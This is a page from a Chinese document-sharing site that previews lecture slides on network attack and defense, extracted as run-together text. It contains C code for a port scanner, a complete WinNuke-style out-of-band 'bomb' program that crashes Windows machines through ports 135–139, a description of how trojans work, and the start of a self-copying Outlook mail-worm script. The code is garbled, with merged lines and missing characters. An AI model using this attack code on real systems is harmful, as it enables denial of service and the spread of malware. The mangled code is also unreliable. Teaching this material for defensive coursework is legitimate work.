网络攻击与防御实例课件.ppt
- 【下载声明】
1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
3. 本页资料《网络攻击与防御实例课件.ppt》由用户(三亚风情)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 网络 攻击 防御 实例 课件
- 资源描述:
-
1、一、扫描器程序设计一、扫描器程序设计要求具备网络攻防基本原理、C+编程技术、VBS脚本编程、基于TCP/IP的Win Scoket编程。这个扫描器相当简单,只需要有一定的C语言编程能力和Socket知识就可以完成。当然,这个简单的扫描器并不是真正意义上的端口扫描器,因为它给出的信息太少了,而且这种扫描会在目标机上留下大量的记录,有经验的管理员一看就知道自己正在受到攻击,而且可以马上追踪到扫描者。如果要进一步扫描出更多信息并隐蔽自己,需要用到许多复杂的扫描技术。Y 建立套接字 设置端口号 用 connect 与指 定 IP 地址连接 与端口请求连接 是否连接? 显示端口开启 显示端口关闭 取下一
2、个端口 N #include /包含windows套接字函数#includestdio.h#pragma comment(lib,ws2_32) /将注释wsock32放置到lib文件中#include#includevoid main()WSADATA ws; /将ws的数据类型声明为WSADATASOCKET s;struct sockaddr_in addr; /系统保存套接字地址的结构体int g1,k;long g2;printf(请输入要监测最大的端口号n);scanf(%d,&k); /下面用connect与端口建立连接,如果可以连接表示端口开启,否则关闭for(int i=1;
3、ik;i+) /循环1到k个端口g2=WSAStartup(0 x0101,&ws);s=socket(PF_INET,SOCK_STREAM,0); /创建套接字,TCP/IP协议,流Socketaddr.sin_family=PF_INET; /规定使用IPv4协议addr.sin_addr.s_addr=inet_addr(10.1.8.*); /指定为IP为10.1.8.*,实验时可以更改addr.sin_port=htons(i); /端口号if(s= =INVALID_SOCKET) break;/如果socket没有连接上,退出g1=connect(s,(struct socka
4、ddr*)&addr,sizeof(addr); /建立连接,判断端口是否关闭if(g1!=0)printf(10.1.8.62:%i 端口关闭n,i); /指定的端口关闭WSACleanup();else printf(10.1.8.*:%i 端口开启n,i); /指定的端口开放closesocket(s); /关闭套接字 二、OOB网络炸弹攻击编程OOB(Out Of Band)是TCP/IP的一种传输模式,是早期Win95/NT的漏洞,攻击者向系统139端口传送0字节数据包时,Win系统自动恢复该数据碎片,导致系统资源耗尽,使机器出现蓝屏,以至死机。常见有:WinNuke、Voob等网络
5、炸弹。该程序是用Visual C+60语言设计的,使用Scoket套接字的通信形式,利用数据包频繁的发送,造成接受方系统瘫痪。#include#include#include#pragma comment(lib,wsock32.lib)/*定义攻击目标计算机的IP地址*/char *IpAddr;int IpPort;/进攻端口135或137或139char *Msg= You are bombed!;/*在被攻击者计算机上显示You are bombed!字符串*/void Banner(void)/*被段显示攻击者信息*/printf(Windows95 OOB Bomber by ji
6、aocang);int main(int argc,char *argv)/*开始定义变量*/struct sockaddr_in sin;WSADATA wsaData;SOCKET sd;Banner();/*显示攻击者信息*/printf(usage:OOB Ip Port 135);return 1; IpAddr=argv1;IpPort=atoi(argv2);/*初始化winsock*/if(WSAStartup(MAKEWORD(2,2),&wsaData)!=0)printf(init socket error!);return 1;IpAddr=argv1;IpPort=a
7、toi(argv2);/*初始化winsock*/If(WSAStartup(0 x0101,&wsaData)/函数WSAStartup()初始化Windows Socket API,参数WAVES指定为winsock版本,参数wsadata指定为返回WSADATA的数据类型printf(“Init TCP/IP stack error!”);Return 1;if(wsaData.wVersion!=0 x0101)printf(Winsock version is incorrect);/*版本有错误,无法通信*/WSACleanup(); /函数WSACleanup()关闭Socket
8、套接字/return 1; if(sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP)= =INVALID_SOCKET)printf(Create socket error!); return 1;/*连接到被攻击者的IP地址#/printf(connecte to 127.0.0.0:139);/*发送攻击字符*/if(send(sd,Msg,strlen(Msg),MSG_OOB)=SOCKET_ERROR)printf(send data error!);closesocket(sd);WSACleanup();return 1;/*关闭连接,释放资源*/
9、closesocket(sd);/WSACleanup();/*提示printf(Bomb complete!);return 0;三、木马设计原理特洛伊木马(Trojan horse)是一种隐藏了具有攻击性的应用程序,与病毒程序不同,它不具备复制能力,其功能具有破坏性质。大部分木马采用C/S运行模式,当服务端在目标计算机上被运行后,打开一个特定的端口进行监听,当客户端向服务器发出连接请求时,服务器端的相应程序会自动运行,来应答客户机的请求。 黑客 目标主机 后门 连接被拒绝 连接成功 源程序如下:四、OutLook漏洞攻击程序设计网络邮箱病毒是目前常见的攻击手段之一,该编程要求学生具备以下几
10、点基础:1VBS脚本语言、Javascript脚本语言、网页编程、Windows系统脚本语言。2 具备网络编程知识,Windows网络安全设置,网络传输构成, Windows注册表设置,请参照信息系统安全与对抗技术实验教程(罗森林、高平)OutLook攻击程序是由VBScript编写的,其自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。我们看看脚本是怎么样完成这个功能的。 Set so=CreateObject(Scripting.FileSystemObject) /是创建一个文件系统对象so.GetFile(WScript.Sc
展开阅读全文